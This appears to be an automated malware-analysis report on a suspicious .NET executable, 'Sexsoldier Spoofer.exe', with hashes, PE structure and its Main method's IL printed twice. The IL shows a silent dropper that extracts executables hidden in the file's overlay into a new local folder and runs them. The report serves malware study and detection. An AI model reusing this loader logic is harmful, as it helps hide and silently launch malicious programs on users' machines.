Suspicious
Suspect

d33faae831659662d5fceaee4bf97cc3

PE Executable
MD5: d33faae831659662d5fceaee4bf97cc3
Size: 4.56 MB
application/x-dosexec
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very low

Hash
Hash Value
MD5
d33faae831659662d5fceaee4bf97cc3
Sha1
eea366a554b08743adf046b41833b699b954212f
Sha256
7ae5c0db3e68a6b6daf70ae0c7eeeb2e07eb2d1b808f9656462759bfdafe835b
Sha384
5a9a759c7aacc15b5096792037f019e1943b0ff2ca1c9cc1969aa9f7b1d3bd4459d8eb958b7a333718897a400b3dfaa4
Sha512
4209e31adbf8e5e24a80e709edff990ab184baed14058d510e92c0d5b9156b3ecaba4e0e1db07419f912c66ab396d5f0da88876a0d137d7968e290922895bc6f
SSDeep
98304:/FACLB4+2La9ec+xKdOEykp8vUQvBcUnxV3RlprqlA:drgLKecykp8vUiBHx1RlUlA
TLSH
E526230223EA03D6E06F5D79C5B64999E2F6B471C764CEBF628401298E67FF04DB6306

PeID

.NET executable
MASM/TASM - sig4 (h)
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
Overlay_bdfdc933.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
Value
Info

PE Detect: PeReader OK (file layout)

Info

Overlay extracted: Overlay_bdfdc933.bin (4549554 bytes)

Module Name

Sexsoldier Spoofer.exe

Full Name

Sexsoldier Spoofer.exe

EntryPoint

System.Void SilentExecuter.Program::Main()

Scope Name

Sexsoldier Spoofer.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Sexsoldier Spoofer

Assembly Version

0.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

2

Main Method

System.Void SilentExecuter.Program::Main()

Main IL Instruction Count

245

Main IL

ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr MergedApps_ call System.Guid System.Guid::NewGuid() stloc.s V_25 ldloca.s V_25 constrained. System.Guid callvirt System.String System.Object::ToString() call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldloc.0 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> ldc.i4.1 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.3 <null> ldloc.3 <null> callvirt System.Int64 System.IO.Stream::get_Length() stloc.s V_4 ldloc.3 <null> ldc.i4.s -20 conv.i8 <null> ldc.i4.2 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.s 20 newarr System.Byte stloc.s V_5 ldloc.3 <null> ldloc.s V_5 ldc.i4.0 <null> ldc.i4.s 20 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldc.i4.4 <null> newarr System.Byte dup <null> ldtoken System.Int32 <PrivateImplementationDetails>{2EEFEEFE-58A5-4A2E-840D-1DFB2CB47221}::$$method0x6000001-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.1 <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 br.s IL_00A9: ldloc.s V_8 ldloc.s V_5 ldc.i4.s 16 ldloc.s V_8 add <null> ldelem.u1 <null> ldloc.s V_6 ldloc.s V_8 ldelem.u1 <null> beq.s IL_00A3: ldloc.s V_8 ldc.i4.0 <null> stloc.s V_7 br.s IL_00AE: ldloc.s V_7 ldloc.s V_8 ldc.i4.1 <null> add <null> stloc.s V_8 ldloc.s V_8 ldc.i4.4 <null> blt.s IL_008F: ldloc.s V_5 ldloc.s V_7 brtrue.s IL_00B7: ldloc.s V_5 leave IL_023E: ret ldloc.s V_5 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_9 ldloc.s V_5 ldc.i4.8 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_10 ldloc.s V_9 ldc.i4.0 <null> conv.i8 <null> ble.s IL_00DB: leave IL_023E ldloc.s V_9 ldloc.s V_4 ldc.i4.s 100 conv.i8 <null> sub <null> blt.s IL_00E0: ldloc.s V_10 leave IL_023E: ret ldloc.s V_10 ldc.i4.0 <null> ble.s IL_00EB: leave IL_023E ldloc.s V_10 ldc.i4.s 100 ble.s IL_00F0: ldloc.3 leave IL_023E: ret ldloc.3 <null> ldloc.s V_9 ldc.i4.0 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldloc.3 <null> ldc.i4.4 <null> conv.i8 <null> ldc.i4.1 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.0 <null> stloc.s V_11 br IL_01F1: ldloc.s V_11 ldc.i4.4 <null> newarr System.Byte stloc.s V_12 ldloc.3 <null> ldloc.s V_12 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_12 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_13 ldloc.s V_13 newarr System.Byte stloc.s V_14 ldloc.3 <null> ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_13 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_14 callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_15 ldc.i4.8 <null> newarr System.Byte stloc.s V_16 ldloc.3 <null> ldloc.s V_16 ldc.i4.0 <null> ldc.i4.8 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_16 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_17 ldloc.0 <null> ldloc.s V_15 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_18 ldloc.s V_18 ldc.i4.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.s V_19 ldc.i4 81920 newarr System.Byte stloc.s V_20 ldloc.s V_17 stloc.s V_21 br.s IL_01C0: ldloc.s V_21 ldloc.s V_20 ldlen <null> conv.i4 <null> conv.i8 <null> ldloc.s V_21 call System.Int64 System.Math::Min(System.Int64,System.Int64) conv.i4 <null> stloc.s V_22 ldloc.3 <null> ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_22 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_23 ldloc.s V_19 ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_23 callvirt System.Void System.IO.Stream::Write(System.Byte[],System.Int32,System.Int32) ldloc.s V_21 ldloc.s V_23 conv.i8 <null> sub <null> stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> conv.i8 <null> bgt.s IL_0190: ldloc.s V_20 leave.s IL_01D4: ldloc.s V_15 ldloc.s V_19 brfalse.s IL_01D3: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_15 ldstr .exe ldc.i4.5 <null> callvirt System.Boolean System.String::EndsWith(System.String,System.StringComparison) brfalse.s IL_01EB: ldloc.s V_11 ldloc.1 <null> ldloc.s V_18 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldloc.s V_10 blt IL_010C: ldc.i4.4 leave.s IL_0206: ldloc.1 ldloc.3 <null> brfalse.s IL_0205: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_26 br.s IL_0220: ldloca.s V_26 ldloca.s V_26 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_24 ldloc.s V_24 call System.Void SilentExecuter.Program::RunWithoutWait(System.String) ldloca.s V_26 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0210: ldloca.s V_26 leave.s IL_0239: leave.s IL_023E ldloca.s V_26 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_023E: ret pop <null> leave.s IL_023E: ret ret <null>

Module Name

Sexsoldier Spoofer.exe

Full Name

Sexsoldier Spoofer.exe

EntryPoint

System.Void SilentExecuter.Program::Main()

Scope Name

Sexsoldier Spoofer.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Sexsoldier Spoofer

Assembly Version

0.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

2

Main Method

System.Void SilentExecuter.Program::Main()

Main IL Instruction Count

245

Main IL

ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr MergedApps_ call System.Guid System.Guid::NewGuid() stloc.s V_25 ldloca.s V_25 constrained. System.Guid callvirt System.String System.Object::ToString() call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldloc.0 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> ldc.i4.1 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.3 <null> ldloc.3 <null> callvirt System.Int64 System.IO.Stream::get_Length() stloc.s V_4 ldloc.3 <null> ldc.i4.s -20 conv.i8 <null> ldc.i4.2 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.s 20 newarr System.Byte stloc.s V_5 ldloc.3 <null> ldloc.s V_5 ldc.i4.0 <null> ldc.i4.s 20 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldc.i4.4 <null> newarr System.Byte dup <null> ldtoken System.Int32 <PrivateImplementationDetails>{2EEFEEFE-58A5-4A2E-840D-1DFB2CB47221}::$$method0x6000001-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.1 <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 br.s IL_00A9: ldloc.s V_8 ldloc.s V_5 ldc.i4.s 16 ldloc.s V_8 add <null> ldelem.u1 <null> ldloc.s V_6 ldloc.s V_8 ldelem.u1 <null> beq.s IL_00A3: ldloc.s V_8 ldc.i4.0 <null> stloc.s V_7 br.s IL_00AE: ldloc.s V_7 ldloc.s V_8 ldc.i4.1 <null> add <null> stloc.s V_8 ldloc.s V_8 ldc.i4.4 <null> blt.s IL_008F: ldloc.s V_5 ldloc.s V_7 brtrue.s IL_00B7: ldloc.s V_5 leave IL_023E: ret ldloc.s V_5 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_9 ldloc.s V_5 ldc.i4.8 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_10 ldloc.s V_9 ldc.i4.0 <null> conv.i8 <null> ble.s IL_00DB: leave IL_023E ldloc.s V_9 ldloc.s V_4 ldc.i4.s 100 conv.i8 <null> sub <null> blt.s IL_00E0: ldloc.s V_10 leave IL_023E: ret ldloc.s V_10 ldc.i4.0 <null> ble.s IL_00EB: leave IL_023E ldloc.s V_10 ldc.i4.s 100 ble.s IL_00F0: ldloc.3 leave IL_023E: ret ldloc.3 <null> ldloc.s V_9 ldc.i4.0 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldloc.3 <null> ldc.i4.4 <null> conv.i8 <null> ldc.i4.1 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.0 <null> stloc.s V_11 br IL_01F1: ldloc.s V_11 ldc.i4.4 <null> newarr System.Byte stloc.s V_12 ldloc.3 <null> ldloc.s V_12 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_12 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_13 ldloc.s V_13 newarr System.Byte stloc.s V_14 ldloc.3 <null> ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_13 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_14 callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_15 ldc.i4.8 <null> newarr System.Byte stloc.s V_16 ldloc.3 <null> ldloc.s V_16 ldc.i4.0 <null> ldc.i4.8 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_16 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_17 ldloc.0 <null> ldloc.s V_15 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_18 ldloc.s V_18 ldc.i4.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.s V_19 ldc.i4 81920 newarr System.Byte stloc.s V_20 ldloc.s V_17 stloc.s V_21 br.s IL_01C0: ldloc.s V_21 ldloc.s V_20 ldlen <null> conv.i4 <null> conv.i8 <null> ldloc.s V_21 call System.Int64 System.Math::Min(System.Int64,System.Int64) conv.i4 <null> stloc.s V_22 ldloc.3 <null> ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_22 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_23 ldloc.s V_19 ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_23 callvirt System.Void System.IO.Stream::Write(System.Byte[],System.Int32,System.Int32) ldloc.s V_21 ldloc.s V_23 conv.i8 <null> sub <null> stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> conv.i8 <null> bgt.s IL_0190: ldloc.s V_20 leave.s IL_01D4: ldloc.s V_15 ldloc.s V_19 brfalse.s IL_01D3: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_15 ldstr .exe ldc.i4.5 <null> callvirt System.Boolean System.String::EndsWith(System.String,System.StringComparison) brfalse.s IL_01EB: ldloc.s V_11 ldloc.1 <null> ldloc.s V_18 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldloc.s V_10 blt IL_010C: ldc.i4.4 leave.s IL_0206: ldloc.1 ldloc.3 <null> brfalse.s IL_0205: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_26 br.s IL_0220: ldloca.s V_26 ldloca.s V_26 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_24 ldloc.s V_24 call System.Void SilentExecuter.Program::RunWithoutWait(System.String) ldloca.s V_26 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0210: ldloca.s V_26 leave.s IL_0239: leave.s IL_023E ldloca.s V_26 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_023E: ret pop <null> leave.s IL_023E: ret ret <null>

d33faae831659662d5fceaee4bf97cc3 (4.56 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙